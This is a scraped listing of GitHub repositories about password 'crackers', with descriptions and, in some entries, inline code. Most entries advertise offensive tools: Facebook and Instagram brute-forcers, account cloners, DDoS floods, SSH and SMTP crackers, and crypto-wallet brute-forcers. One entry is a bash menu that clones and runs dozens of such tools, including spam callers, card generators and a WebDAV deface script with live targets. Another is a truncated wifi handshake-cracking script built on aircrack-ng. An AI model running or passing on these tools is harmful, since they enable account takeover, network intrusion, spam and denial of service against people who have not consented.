Found 401 repositories(showing 30)
Hackertrackersj
hacking-tool termux-tools termux noob-friendly instagram-bot bruteforce-password-cracker wordlist-technique
cracker911181
All in One CRACKER911181's Tool. This Tool For Hacking and Pentesting. 🎭
lunnar211
facebook-cracker Facebook Cracker Version 1.0 can crack into Facebook Database 100% without Interruption By Facebook Firewall This program is for educational purposes only. Don't attack people facebook accounts it's illegal ! If you want to crack into someone's account, you must have the permission of the user. Mauritania Attacker is not responsible Whit is a facebook-cracker I have written lots of facebook hacking art icle like hack facebook using android smartphone,open source tools,python and perl script etc.. But Toady I'will tell you about hacking in Facebook Using Brute force attack. In brute force attack method,tool try all combination of password to provide access of victim account Brute force attack is the only successful method to hack facebook account. Hack Facebook Account Password Using Brute Download&Install git clone https://github.com/Ha3MrX/facebook-cracker cd facebook-cracker chmod +x facebook.py python facebook.py ScreenShot capture
ritvikb99
DDOS Tool: To take down small websites with HTTP FLOOD. Port scanner: To know the open ports of a site. FTP Password Cracker: To hack file system of websites.. Banner Grabber: To get the service or software running on a port. (After knowing the software running google for its vulnerabilities.) Web Spider: For gathering web application hacking information. Email scraper: To get all emails related to a webpage IMDB Rating: Easy way to access the movie database. Both .exe(compressed as zip) and .py versions are available in files.
BotolMehedi
B2K4 - New Facebook OLD Id Cloner Tool | 2003-2011 Facebook Account Cloner | Custom Cloner Maker | Number + UID Cloner | Crack From Friendlist | Crack From Public | Crack From File | File Cloner | Without Login Cloner | With 50+ Extra Passwords Cracker | No Checkpoint JUST NOW LOGIN | All New APIs For Cracking | [ PAID + FREE TOOL ]
noptrix
A fast SSH mass-scanner, login cracker and banner grabber tool using the python-masscan and shodan module.
openwall
Community packages of John the Ripper, the auditing tool and advanced offline password cracker (Docker images, Windows PortableApp, Mac OS, Flatpak, and Ubuntu SNAP packages)
HARRY-EXE
HARRYv6 - New Facebook Old/New/Mix Id Cracker Tool | Public Cracker | File Cracker | Love From Nepal ❤️
Aron-Tn
[NEW] : Simple Mail Transfer Protocol (SMTP) CHECKER - CRACKER Tool V2
SEFAT-777
THIS IS FILE & RANDOM CRACKER TOOL⚠️
Matrix-Community-ORG
A powerful (SSH Cracker) and efficient SSH connection testing tool written in Go. Features include multi-threaded testing, real-time progress monitoring, Discord webhook integration, and a robust license system. Perfect for network administrators and security professionals to test SSH connection security.
Mr-Anonymous002
No description available
Aron-Tn
[NEW] : Simple Mail Transfer Protocol (SMTP) CHECKER - CRACKER Tool V3
nugroho466
Special thanks to Ranginang67 for DarkFly (Collection of hack tools), threat9 for routersploit (Wifi cracker) and BOT C0DER for SniperMan (DDoS Attack)
IamAshrafee
Advanced RAR Password Cracker is a GUI tool for recovering lost/finding or cracking RAR passwords using dictionary and brute force attacks. Features multi-threading, batch processing, progress tracking, and cross-platform support. Developed in Python with a focus on usability and performance.
DrPython3
Bruteforce tool / cracker for MD5 hashes. Processing single hashes, lists and combolists (userid:md5hash).
iosdeveloper
Hosted receipt verification solution to in-app purchase bypass with tools like 'iAP Cracker'
MrAstra96
#TOOL INSTALLER V.1.0 #CODED BY : Mr.Astra96 #CODENAME : DheMell bi='\033[34;1m' #biru ij='\033[32;1m' #ijo pr='\033[35;1m' #purple cy='\033[36;1m' #cyan me='\033[31;1m' #merah pu='\033[37;1m' #putih ku='\033[33;1m' #kuning or='\033[1;38;5;208m' #Orange echo "-----------------------------------------------------------" toilet -f pagga " Kalsel{Z}Tool"|lolcat echo "-----------------------------------------------------------" echo $ij"[+]─────────────────────────────────────────────────────[+]" echo $ij" | •••••••••• |Kalsel[E]Xploit| •••••••••••• |" echo $ij" | ───────────────────────────────────────────────────── |" echo $ij" | VERSION TOOL: INSTALLER V.1.0 |" echo $ij" | Author : Mr.Astra |" echo $ij" | CodeName : IY×TraCode |" echo $ij" | Instagram : mr_astra96 |" echo $ij" | Telegram : htttps://t.me/RabbitCL4Y |" echo $ij" | Github : https://github.com/RabbitCL4Y |" echo $ij" | Thanks To : •Santri Pasuruan• |" echo $ij" | COPYRIGHT : 2K19 Kalsel[E]Xploit |" echo $ij"[+]─────────────────────────────────────────────────────[+]" echo echo $pu"───────────────────────────────────────────" echo $or"[00]" $pu"About" $ku"Tool" $ij"Program" echo $pu"───────────────────────────────────────────" echo $pu"───────────────────────────────────────────" echo $me" Kalsel[E]Xploit×Tool" echo $pu"───────────────────────────────────────────" echo $cy"[01]" $ku"SPAM-CALL |" echo $cy"[02]" $pu"Yt-Downloader |" echo $cy"[03]" $me"DORK-SCANNER |" echo $cy"[04]" $pr"REV-IP |" echo $cy"[05]" $ij"CHECK-IP |" echo $cy"[06]" $bi"INSTAHACK |" echo $cy"[07]" $or"AdminFinder |" echo $cy"[08]" $ku"DDoS |" echo $cy"[09]" $pu"MD5-CRACKER |" echo $cy"[10]" $me"CAPING-BOT |" echo $cy"[11]" $pr"MAIL-SPAMMER |" echo $cy"[12]" $ij"Im3-Spammer |" echo $cy"[13]" $bi"Create-Bot-SSH |" echo $cy"[14]" $or"ghoul |" echo $cy"[15]" $ku"SQLI-Vuln-Checker |" echo $cy"[16]" $pu"Wp-Scan |" echo $cy"[17]" $me"NAS |" echo $cy"[18]" $pr"Mp4-Convert |" echo $cy"[19]" $ij"Exploit-LokoMedia |" echo $cy"[20]" $bi"DDoS-With-Perl |" echo $cy"[21]" $or"ApkPure-Downloader |" echo $cy"[22]" $ku"GitHub-Info |" echo $cy"[23]" $pu"Proxy-Checker |" echo $cy"[24]" $me"PenKEX [Penetration Testing] |" echo $cy"[25]" $pr"Ysub-Checker |" echo $cy"[26]" $ij"Text-To-Hex |" echo $cy"[27]" $bi"Apk-Webdav (By :Kalsel[E]Xploit) |" echo $cy"[28]" $or"Pentester |" echo $cy"[29]" $ku"ASWPLOIT |" echo $cy"[30]" $pu"InFoGa {Information-Gathering} |" echo $pu"───────────────────────────────────────────" echo $me" ZseCc0de-Crew.ID×Tool" echo $pu"───────────────────────────────────────────" echo $cy"[31]" $ku"ParrotSec |" echo $cy"[32]" $pu"GrabGithub |" echo $cy"[33]" $me"SubFinder |" echo $cy"[34]" $pr"RoliSpam |" echo $cy"[35]" $ij"Mail-Filter |" echo $cy"[36]" $bi"AdminScan |" echo $cy"[37]" $or"IPinfo |" echo $cy"[38]" $ku"CardGen |" echo $cy"[39]" $pu"CardValidator |" echo $cy"[40]" $me"BlogGrab |" echo $cy"[41]" $pr"IgStalker |" echo $cy"[42]" $ij"GpsTrack |" echo $cy"[43]" $bi"UrlDecode |" echo $cy"[44]" $or"Checker |" echo $cy"[45]" $ku"FbBot |" echo $cy"[46]" $pu"YtSub |" echo $pu"───────────────────────────────────────────" echo $me" I.T.A×Tool" echo $pu"───────────────────────────────────────────" echo $cy"[47]" $ku"TOOLINSTALLERv1 |" echo $cy"[48]" $pu"TOOLINSTALLERv2 |" echo $cy"[49]" $me"TOOLINSTALLERv3 |" echo $cy"[50]" $pr"TOOLINSTALLERv4 |" echo $cy"[51]" $ij"DIR |" echo $cy"[52]" $bi"REVERSEIP |" echo $cy"[53]" $or"TRACKIP |" echo $cy"[54]" $ku"DNSLOOKUP |" echo $cy"[55]" $pu"WHOIS |" echo $cy"[56]" $me"REVESEDNS |" echo $cy"[57]" $pr"WEBDAV |" echo $cy"[58]" $ij"DIRHUNT |" echo $cy"[59]" $bi"SUBDO |" echo $cy"[60]" $or"HTTPHEADERS |" echo $cy"[61]" $ku"YOUTUBE-DOWNLOADER |" echo $cy"[62]" $pu"ADLOG (ADMIN LOGIN) |" echo $cy"[63]" $me"JADWAL-SHOLAT |" echo $cy"[64]" $pr"TOOLKIT |" echo $cy"[65]" $ij"BASH-ENCRYPT |" echo $cy"[66]" $bi"ENCRYPT-PYTHON |" echo $cy"[67]" $or"Facebook-BruteForce |" echo $cy"[68]" $ku"VULNSCANNING |" echo $cy"[69]" $pu"SHORTENERLINKS |" echo $cy"[70]" $me"PERKIRAANCUACA |" echo $cy"[71]" $pr"ARITMATIKA |" echo $pu"───────────────────────────────────────────" echo $me" Black Coder Crush×Tool" echo $pu"───────────────────────────────────────────" echo $cy"[72]" $ku"Shortlink |" echo $cy"[73]" $pu"404GitHub |" echo $cy"[74]" $me"X-Caping |" echo $cy"[75]" $pr"ScriptCreator |" echo $cy"[76]" $ij"LinkChatGen |" echo $cy"[77]" $bi"BulkMailSpam |" echo $cy"[78]" $or"BinCon |" echo $cy"[79]" $ku"DfvAscii |" echo $cy"[80]" $pu"DfvXploit |" echo $pu"───────────────────────────────────────────" echo $me" BlackWare Coders Team×Tool" echo $pu"───────────────────────────────────────────" echo $cy"[81]" $ku"Dorking |" echo $cy"[82]" $pu"Scanning |" echo $cy"[83]" $me"Reverse-Ip |" echo $cy"[84]" $pr"CBT-Vuln-Scanner |" echo $pu"───────────────────────────────────────────" echo $me" INSTALL BAHANNYA DULU GAN" echo $pu"───────────────────────────────────────────" echo $cy"[99]" $or"PILIH AKU SENPAI😍😍" echo $pu"───────────────────────────────────────────" echo $me"┌==="$bi"["$i"Mr.Astra code"$bi"]"$me"======"$bi"["$i""SELECT THE NUMBER""$bi"]" echo $me"¦" read -p"└──# " kaex if [ $kaex = 1 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/SPAM-CALL cd SPAM-CALL bash CaLL.sh fi if [ $kaex = 2 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/YOUTUBE-DOWNLOADER cd YOUTUBE-DOWNLOADER python2 youtube.py fi if [ $kaex = 3 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/DORK-SCANNER cd DORK-SCANNER php scan.php fi if [ $kaex = 4 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/REV-IP cd REV-IP python3 rev.io fi if [ $kaex = 5 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/CHECK-IP cd CHECK-IP python2 checkip.py fi if [ $kaex = 6 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/INSTAHACK cd INSTAHACK python2 insta.py fi if [ $kaex = 7 ] then clear figlet -f slant "[PLEASE WAIT"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/AdminFinder cd AdminFinder python2 admin.py fi if [ $kaex = 8 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/DDoS cd DDoS python2 ddos.py fi if [ $kaex = 9 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/MD5-CRACKER cd MD5-CRACKER python2 md5.py fi if [ $kaex = 10 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/CAPING-BOT cd CAPING-BOT php bot.php fi if [ $kaex = 11 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/MAIL-SPAMMER cd MAIL-SPAMMER php mail.php fi if [ $kaex = 12 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/Im3-Spammer cd Im3-Spammer php im3.php fi if [ $kaex = 13 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/CREATE-BOT-SSH cd CREATE-BOT-SSH python2 ssh.py fi if [ $kaex = 14 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/ghoul cd ghoul python3 ghoul.py fi if [ $kaex = 15 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/SQLI-Vuln-Checker cd SQLI-Vuln-Checker python3 sqli.py fi if [ $kaex = 16 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/Wp-Scan cd Wp-Scan python2 auto.py fi if [ $kaex = 17 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/NAS cd NAS python3 sabyan.chan fi if [ $kaex = 18 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/Mp4-Convert cd Mp4-Convert python2 tube.py fi if [ $kaex = 19 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/Exploit-Lokomedia cd Exploit-Lokomedia python2 Loko.py fi if [ $kaex = 20 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/DDoS-With-Perl cd DDoS-With-Perl perl dos.pl fi if [ $kaex = 21 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/Apkpure-Downloader cd Apkpure-Downloader pip2 install -r requirements.txt python2 apk.py fi if [ $kaex = 22 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/GitHub-Info cd GitHub-Info python3 github.py -h fi if [ $kaex = 23 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/PROXY-CHECKER cd PROXY-CHECKER python3 proxy.py fi if [ $kaex = 24 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/PenKEX cd PenKEX python2 PenKex.py fi if [ $kaex = 25 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/Ysub-Checker cd Ysub-Checker php ysub.php fi if [ $kaex = 26 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/Text-To-Hex cd Text-To-Hex python2 hextex.py fi if [ $kaex = 27 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/Webdav-Apk mv -f Webdav-Apk /sdcard cd /sdcard/Webdav-Apk echo $cy"APLIKASI WEBDAV NYA ADA DI DIRECTORY SDCARD/INTERNAL KALIAN" sleep 9 ls fi if [ $kaex = 28 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/Pentester cd Pentester python2 pentest.py fi if [ $kaex = 29 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/ASWPLOIT cd ASWPLOIT sh install.sh fi if [ $kaex = 30 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/InFoGa cd InFoGa python infoga.py fi if [ $kaex = 31 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/zsecc0de-crew-id/ParrotSec cd ParrotSec bash parrot.sh fi if [ $kaex = 32 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/zsecc0de-crew-id/grabgithub cd grabgithub bash github.sh fi if [ $kaex = 33 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/zsecc0de-crew-id/subfinder cd subfinder bash subdocheck.sh fi if [ $kaex = 34 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/zsecc0de-crew-id/rolispam cd rolispam bash rolispam.sh fi if [ $kaex = 35 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/zsecc0de-crew-id/mail-filter cd mail-filter bash filter.sh fi if [ $kaex = 36 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/zsecc0de-crew-id/adminscan cd adminscan bash admin.sh fi if [ $kaex = 37 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/zsecc0de-crew-id/Ipinfo cd Ipinfo bash ipinfo.sh fi if [ $kaex = 38 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/zsecc0de-crew-id/cardgen cd cardgen bash cc.sh fi if [ $kaex = 39 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/zsecc0de-crew-id/cardvalidator cd cardvalidator bash card.sh fi if [ $kaex = 40 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/zsecc0de-crew-id/bloggrab cd bloggrab bash bloggrab.sh fi if [ $kaex = 41 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/zsecc0de-crew-id/igstalker cd igstalker bash igstalker.sh fi if [ $kaex = 42 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/zsecc0de-crew-id/gpstrack cd gpstrack bash gpstrack.sh fi if [ $kaex = 43 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/zsecc0de-crew-id/urldecode cd urldecode bash urldecode.sh fi if [ $kaex = 44 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/zsecc0de-crew-id/checker cd checker bash yahoo.sh fi if [ $kaex = 45 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/zsecc0de-crew-id/fbbot cd fbbot bash bot.sh fi if [ $kaex = 46 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/zsecc0de-crew-id/ytsubs cd ytsubs bash ytsubs.sh fi if [ $kaex = 47 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/TUANB4DUT/TOOLSINSTALLERv1 cd TOOLSINSTALLERv1 sh Tuanb4dut.sh fi if [ $kaex = 48 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/TUANB4DUT/TOOLSINSTALLERv2 cd TOOLSINSTALLERv2 sh Tuanb4dut.sh fi if [ $kaex = 49 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/TUANB4DUT/TOOLSINSTALLERv3 cd TOOLSINSTALLERv3 sh TUANB4DUT.sh fi if [ $kaex = 50 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/TUANB4DUT/TOOLSINSTALLERv4 cd TOOLSINSTALLERv4 chmod +x TUANB4DUT..sh ./TUANB4DUT..sh fi if [ $kaex = 51 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/TUANB4DUT/DIR cd DIR sh dir.sh fi if [ $kaex = 52 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/TUANB4DUT/REVERSEIP sh REVERSEIP.sh fi if [ $kaex = 53 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/TUANB4DUT/TRACKIP cd TRACKIP sh TRACKIP.sh fi if [ $kaex = 54 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/TUANB4DUT/DNSLOOKUP cd DNSLOOKUP sh DNSLOOKUP.sh fi if [ $kaex = 55 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/TUANB4DUT/WHOIS cd WHOIS sh WHOIS.sh fi if [ $kaex = 56 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/TUANB4DUT/REVERSEDNS cd REVERSEDNS sh REVERSEDNS.sh fi if [ $kaex = 57 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/TUANB4DUT/WEBDAV cd WEBDAV echo $or"LIVE TARGET DEFACE POC WEBDAV" cat WebLiveTarget.txt sleep 7 sh webdav.sh fi if [ $kaex = 58 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/TUANB4DUT/DIRHUNT cd DIRHUNT sh DIRHUNT.sh fi if [ $kaex = 59 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/TUANB4DUT/SUBDO cd SUBDO sh subdo.sh fi if [ $kaex = 60 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/TUANB4DUT/HTTPHEADERS cd HTTPHEADERS sh httpheaders.sh fi if [ $kaex = 61 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/TUANB4DUT/YOUTUBE cd YOUTUBE sh install.sh chmod +x YOUTUBE.sh ./YOUTUBE.sh fi if [ $kaex = 62 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/TUANB4DUT/ADLOG cd ADLOG python2 adlog.py fi if [ $kaex = 63 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/TUANB4DUT/JADWALSHOLAT cd JADWALSHOLAT sh jadwal.sh fi if [ $kaex = 64 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/TUANB4DUT/TOOLKIT cd TOOLKIT sh TUANB4DUT.sh fi if [ $kaex = 65 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/TUANB4DUT/BASH-ENCRYPT cd BASH-ENCRYPT sh setup.sh sh encrypt.sh fi if [ $kaex = 66 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/TUANB4DUT/ENCRYPT-PYTHON cd ENCRYPT-PYTHON python2 compile.py fi if [ $kaex = 67 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/TUANB4DUT/FACEBOOK-BRUTEFORCE cd FACEBOOK-BRUTEFORCE python2 bruteforce.py fi if [ $kaex = 68 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/TUANB4DUT/VULNSCANNING cd VULNSCANNING python2 testvuln.py fi if [ $kaex = 69 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/TUANB4DUT/SHORTNERLINKS cd SHORTNERLINKS sh URL.sh fi if [ $kaex = 70 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/TUANB4DUT/PERKIRAAN-CUACA cd PERKIRAAN-CUACA sh CUACA.sh fi if [ $kaex = 71 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/TUANB4DUT/ARITMATIKA cd ARITMATIKA sh aritmatika.sh fi if [ $kaex = 72 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/blackcodercrush/shortlink cd shortlink python2 shortlink.py fi if [ $kaex = 73 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/blackcodercrush/404Github cd 404Github python2 404Github.py fi if [ $kaex = 74 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/blackcodercrush/X-Caping cd X-Caping python2 Scaping.py fi if [ $kaex = 75 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/blackcodercrush/ScriptCreator cd ScriptCreator python2 Screator.py fi if [ $kaex = 76 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/blackcodercrush/LinkChatGen cd LinkChatGen sh chat.wa fi if [ $kaex = 77 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/blackcodercrush/BulkMailSpam cd BulkMailSpam python2 BulkMailSpam.py exit fi if [ $kaex = 78 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/blackcodercrush/BinCon cd BinCon pythob2 bin.con exit fi if [ $kaex = 79 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/blackcodercrush/DfvAscii cd DfvAscii sh dfv.ascii fi if [ $kaex = 80 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/blackcodercrush/DfvXploit cd DfvXploit pip install -r modul.txt python dfv.xploit fi if [ $kaex = 81 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/black-ware/Dorking cd Dorking sh Dork.sh fi if [ $kaex = 82 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/black-ware/scanning cd scanning sh vuln-scanner.sh fi if [ $kaex = 83 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/black-ware/Reverse-Ip cd Reverse-Ip python2 github.py fi if [ $kaex = 84 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/black-ware/CBT-Vuln_scanner cd CBT-Vuln_scanner python2 cbt-scanner.py fi if [ $kaex = 99 ] then clear pkg update && pkg upgrade pkg install git pkg install python2 && pkg install python pip2 install lolcat pip2 install requests pip2 install mechanize pip2 install dirhunt pip2 install youtube-dl pkg install curl pkg install php pip2 install termcolor pip2 install bs4 pip2 install beautifulsoup pip2 install colorama pkg install perl pkg install ruby pip install requests pkg install figlet fi if [ $kaex = 00 ] then clear echo $pu"───────────────────────────────────────────" echo $or"CEO" $ku"AND" $bi"FOUNDER" $ij"Kalsel" $pu"[" $pr"E" $pu"]" $cy"Xploit" echo $pu"───────────────────────────────────────────" echo $ij"CEO & FOUNDER" $or"Kalsel" $bi"[" $ij"E" $bi"]" $or"Xploit" echo $cy"NAME : ARDHO AINULLAH" echo $or"CODENAME : MUH4K3M0S" echo $pu"SCHOOL : DARUSSALLAM" echo $ku"REGION : KALIMANTAN SELATAN" echo $pu"───────────────────────────────────────────" echo $ij"LEADER" $or"kalsel" $bi"[" $ij"E" $bi"]" $or"Xploit" echo $or"NAME : MUHAMMAD RAFLI" echo $ij"CODENAME : IY×RafCode" echo $cy"SCHOOL : NURUL HIDAYAH" echo $ku"REGION : KALIMANTAN SELATAN" echo $pu"───────────────────────────────────────────" echo $ij"CO-LEADER" $or"kalsel" $bi"[" $ij"E" $bi"]" $or"Xploit" echo $ku"NAME : M.WIDHI SATRIO" echo $ij"CODENAME : WIDHISEC" echo $pu"SCHOOL : ----" echo $cy"REGION : KALIMANTAN BARAT" echo $pu"───────────────────────────────────────────" echo $ij"ADMIN" $or"kalsel" $bi"[" $ij"E" $bi"]" $or"Xploit" echo $pr"NAME : --------" echo $or"CODENAME : MR_MSDV" echo $pu"SCHOOL : -------" echo $ku"REGION : KALIMANTAN SELATAN" echo $pu"───────────────────────────────────────────"
Hunter-alamin
Bangladeshi Without Log In New Number Cloning Tool Automatic pass cracker + can clone From Given Passwords I am The Real Owner Of This Tool Don't Copy My Script
Ilyasayunus
Carnom Wallet Cracker 2024 - is a tool for brute forcing Crypto Wallets
rgx91
A c# cracker tool for bitcoin brainwallets and other low entropy key algorithms.
salman1123
#!/usr/bin/env python import os import subprocess from subprocess import check_call print("\nInstalling Needed Tools") print("\n") cmd0 = os.system("apt-get install aircrack-ng crunch xterm wordlists reaver pixiewps bully xterm wifite") cmd = os.system("sleep 3 && clear") def intro(): cmd = os.system("clear") print("""\033[1;32m --------------------------------------------------------------------------------------- ____ _ ____ _ ___ _ _ ____ _ ____ / _ \/ \ /|/ _ \/ \ /|\ \/// \__/|/ _ \/ \ /\/ ___\ | / \|| |\ ||| / \|| |\ || \ / | |\/||| / \|| | ||| \ | |-||| | \||| \_/|| | \|| / / | | ||| \_/|| \_/|\___ | \_/ \|\_/ \|\____/\_/ \|/_/ \_/ \|\____/\____/\____/ Coded By anonymous banda --------------------------------------------------------------------------------------- (1)Start monitor mode (2)Stop monitor mode (3)Scan Networks (4)Getting Handshake(monitor mode needed) (5)Install Wireless tools (6)Crack Handshake with rockyou.txt (Handshake needed) (7)Crack Handshake with wordlist (Handshake needed) (8)Crack Handshake without wordlist (Handshake,essid needed) (9)Create wordlist (10)WPS Networks attacks (bssid,monitor mode needed) (11)Scan for WPS Networks (0)About Me (00)Exit ----------------------------------------------------------------------- """) print("\nEnter your choise here : !# ") var = int(input("")) if var == 1 : print("\nEnter the interface:(Default(wlan0/wlan1))") interface = input("") order = "airmon-ng start {} && airmon-ng check kill".format(interface) geny = os.system(order) intro() elif var == 2 : print("\nEnter the interface:(Default(wlan0mon/wlan1mon))") interface = input("") order = "airmon-ng stop {} && service network-manager restart".format(interface) geny = os.system(order) intro() elif var == 3 : print("\nEnter the interface:(Default >> (wlan0mon/wlan1mon))") interface = input("") order = "airodump-ng {} -M".format(interface) print("When Done Press CTRL+c") cmd = os.system("sleep 3") geny = os.system(order) cmd = os.system("sleep 10") intro() elif var == 4 : print("\nEnter the interface:(Default >>(wlan0mon/wlan1mon))") interface = input("") order = "airodump-ng {} -M".format(interface) print("\nWhen Done Press CTRL+c") print("\nNote: Under Probe it might be Passwords So copy them to the worlist file") print("\nDon't Attack The Network if its Data is ZERO (you waste your time)") print("\nyou Can use 's' to arrange networks") cmd = os.system("sleep 5") geny = os.system(order) print("\nEnter the bssid of the target?") bssid = str(input("")) print("\nEnter the channel of the network?") channel = int(input()) print("Enter the path of the output file ?") path = str(input("")) print("\nEnter the number of the packets [1-10000] ( 0 for unlimited number)") print("the number of the packets Depends on the Distance Between you and the network") dist = int(input("")) order = "airodump-ng {} --bssid {} -c {} -w {} 